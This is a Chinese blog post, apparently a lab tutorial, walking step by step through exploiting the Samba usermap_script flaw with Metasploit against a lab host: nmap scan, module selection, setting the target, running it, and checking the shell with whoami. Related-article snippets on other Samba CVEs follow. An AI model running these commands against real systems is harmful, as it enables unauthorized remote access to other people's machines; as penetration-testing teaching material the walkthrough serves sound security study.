Metasploit 溢出 samba 提权漏洞

最新推荐文章于 2024-08-19 19:20:19 发布
最新推荐文章于 2024-08-19 19:20:19 发布
阅读量517 收藏 4
点赞数 4
文章标签: 网络 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_78677624/article/details/138309938
版权

一、信息收集
1.1 右键单击桌面,选择 Open Terminal Here ,打开终端。


1.2 输入命令 nmap -sS -p 139,445 -A 192.168.1.254 ,对目标主机进行扫描,发现
139、445 端口开放。

1.3 输入命令“msfconsole”,启动 MSF 终端。


1.4 输入命令“search samba”,搜索 samba 的相关攻击脚本。

1.5 输入命令“use exploit/multi/samba/usermap_script”,启用漏洞利用模块, 提
示符就会提示进入到该路径下。


1.6 输入命令“show options”,查看需要设置的相关项,yes 表示必须填写的参数。


1.7 输入命令“set rhost 192.168.1.254”,设置目标主机的 IP 地址。


1.8 输入命令“run”, 向目标主机攻击,建立会话。

1.9 输入命令 whoami、uname -a ,查看目标系统相关信息。


 

Stars-yolo
关注
Samba远程代码执行漏洞复现-CVE-2017-7494
weixin_48128812的博客
12-02 3606
一、概述 Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。 二、漏洞影响版本 Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。 三、漏洞利用条件 1、服务器打开了文件/打印机共享端口445 2、共享文件拥有访问以及写入限 3、攻击者知道
34. Metasploit通过samba服务获取shell
__Qian的博客
03-13 860
1.使用nmap扫描端口 2.收集到目标机相关信息后,为其选择正确的Exploit和合适的Payload,从扫描结果发现主机运行着Samba 3.x服务 输入search samba 命令搜索Smaba的漏洞利用模块 3.选择漏洞利用模块 因为exploit/multi/samba/usermap_script 模块被标记为“Excellent”,即为最杰出而且时间是最新的,选择次模块进行渗透...
Metasploit漏洞利用系列(六):MSF渗透测试 - 利用Samba服务漏洞入侵Linux主机实战
最新发布
2402_86373248的博客
08-19 958
在本系列的第六篇文章中,我们将深入探究如何利用Metasploit Framework (MSF) 针对Samba服务存在的漏洞进行Linux主机的渗透测试。1. 搭建测试环境:在虚拟化环境中部署一个具有Samba服务的Linux主机,确保其版本包含已知漏洞,例如早期的Samba 3.x或4.x版本。通过Samba服务的漏洞,发送恶意数据包至目标主机,触发漏洞利用,一旦成功,将在Metasploit控制台上获得一个Meterpreter会话。根据识别到的Samba版本,选择相应的漏洞利用模块。
Metasploit溢出samba漏洞
weixin_33862041的博客
12-09 765
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。一、利用nmap工具扫描目标主机1.1使用nmap命令对目...
android4.0漏洞msf,Metasploit溢出samba漏洞
weixin_36307377的博客
06-03 560
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,...
metasploit---后漏洞利用-
孤的博客
11-17 1839
就是升对资源的访问限,正常情况下,这些资源是否保护的,拒绝普通或为授用户访问。通过限,恶意用户可以执行为授的行为,可以对计算机或者整个网络造成危害。 广义上分为两种形式 垂直:在这种升方式中,低限的用户或应用程序能够访问那些只针对授用户或管理员用户才能使用的功能。这种特征也称作限升级。 水平:这种通常指的是用户限在水平方向的扩展,也就是,普通用户能访...
samba 3.x漏洞
→_→
08-17 1481
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。 [实验目的] 1) 利用Samba漏洞,获得目标主机root限 [实验原理] 1) Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh.如果再调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用交了而已输入的话,就可能允许攻击者以nobody用户的限执行任意命令.Samba服务端口:139\445. ...
CVE-2015-0240: Samba 漏洞风险
weixin_33850015的博客
06-06 401
Samba的守护进程smbd里有一个为初始化的指针可被远程漏洞利用,这个编号CVE-2015-0240的漏洞允许一个恶意的Samba客户端发送一个特定的netlogon数据包给smbd获得smbd运行的限,而smbd的默认限是root,这个漏洞影响了Samba 3.5和更新的版本,主流的GNU/Linux发行版都受到了影响,目前Debian已经修复。...
Metasploit学习笔记(三)——Samba 3.x服务漏洞复现
Zichel77的博客
10-07 914
享文件和打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间供文件及打印机等资源的共享服务。尝试别的exploit或者payload也不太行,但这里主要是把过程过一遍,和永恒之蓝的利用步骤完全一样。因为目标是Linux机器,一定要选择Linux的攻击载荷,而且不是每个都有用的,可以一个个尝试一下。此步就是收集主机的信息,得知445端口开放,就可以利用基于该端口的相关漏洞。然后选择Rank为excellent并且时间较新的加以利用,以高渗透成功率。本次利用选择的是13号。
基于Metasploit完成Samba服务漏洞复现
linxaiomo
03-10 8049
实验环境: 靶机ip:192.168.31.182(下载链接: https://pan.baidu.com/s/1ia-DD8UPDhIkWUd2eJWoKg?pwd=cykq 取码: cykq 复制这段内容后打开百度网盘手机App,操作更方便哦) 攻击机ip:192.168.31.166(X64) 一:主机发现 arp-scan -l #扫描同一网段下的主机 可以看到靶机的IP地址和mac地址,Vmware为虚拟机 2.漏洞扫描 nmap 192.168.31.182.
基于BT5R3-Metasploit完成Linux Metasploit靶机中的Samba服务漏洞复现
F14735971227的博客
01-20 822
back track5R3对Linux Metasploit中的samba服务漏洞的利用
4.9、漏洞利用 smb-RCE远程命令执行
c10udz的博客
11-12 3858
1.1 samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。1.2 SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间供文件及打印机等资源的共享服务。SMB协议是客户机/服务器(C/S)型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。1.3 samba监听的端口。
2.8 利用samba漏洞进行渗透
qq_55202378的博客
07-17 2652
samba漏洞
ctf:kali2:渗透Samba:exploit/multi/samba/usermap_script
viviliving的专栏
12-09 1501
从输出的信息中,可以看到成功的打开了一个会话。这表示已成功攻击了目标主机。此时用户可以执行一些Linux命令,查看目标主机的相关信息。从输出的信息中,可以看到当前目标系统登录的用户名是root。如果想了解该用户的详细信息,可以使用id命令查看。输出的信息表上root用户属于root组,并且其UID和GID都为0。whoami #查看当前登录系统的用户。id #查看当前登录用户的信息。
MSF以及Samba漏洞利用
zyh18851473527的博客
11-15 7920
文章目录MSF以及Samba漏洞利用一、Metasploit简介1.1MSF启动1.2问题报错1.2.1及时更新源1.2.2下载数据库二、Metasploit基础2.1专业术语2.2渗透攻击步骤三、主机扫描3.1使用辅助模块进行端口扫描3.1.1检查有哪些可用端口3.1.2一个小问题**3.1.3使用TCP扫描模块并检查有那些参数需要设置**3.1.4使用unset取消某个参数3.2使用辅助模块进行服务扫描3.3使用Nmap扫描3.3.1系统扫描四、漏洞利用4.1Metasploitable2搭建4.2 S
网安学途—Samba渗透远程命令注入漏洞 username map script(CVE-2007-2447 )
星虐
01-10 2592
CVE-2007-2447是Samba协议中的一个远程命令注入漏洞,影响版本为Samba 3.0.20至3.0.25。该漏洞存在于“username map script”功能中,攻击者可以通过注入恶意命令来执行任意代码。利用过程包括扫描目标Samba服务版本,确认其受漏洞影响后,使用Metasploit框架中的exploit/multi/samba/usermap_script模块进行攻击。实验步骤中,攻击机为Kali Linux,靶机为Metasploitable2。通过设置相关参数并执行模块,攻击者成
如何使用 NMAP 命令进行网络扫描
qq_53058639的博客
04-03 606
Mapper”)是一个免费的开源(许可)实用程序,用于网络发现和安全审计。许多系统和网络管理员还发现它对网络清单、管理服务升级计划以及监控主机或服务正常运行时间等任务很有用。Nmap以新颖的方式使用原始 IP数据包来确定网络上可用的主机、这些主机供的服务(应用程序名称和版本)、它们运行的操作系统(和操作系统版本)、数据包过滤器/防火墙的类型正在使用,以及许多其他特性。它旨在快速扫描大型网络,但对单个主机也能正常工作。Nmap。
20232805 2023-2024 《网络攻防实践》第7周作业
h1046782759的博客
04-28 864
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问限。实践步骤如下:①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
Metasploit学习: Samba服务 usermap_script安全漏洞利用
Sy0ung_的博客
11-18 1992
Metasploit学习: Samba服务 usermap_script安全漏洞利用 1、username_script 是什么 - Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行 - 影响Samba的3.0.20到3.0.25rc3 版本 - 当使用非默认的用户名映射脚本配置选项时产生 - 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令 2、如何利用 1、使用metasploit框架 3、漏洞时间线 漏洞的时间线: - 2007年5月7日:漏洞匿名披露到
Metasploit框架基础教程
Metasploit是一款强大的安全测试工具,它被广泛用于漏洞利用、渗透测试和安全研究。这个框架由各种接口组成,允许用户以不同的方式与其交互。本文将主要介绍Metasploit中的基础概念和一个重要的接口——Msfcli。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值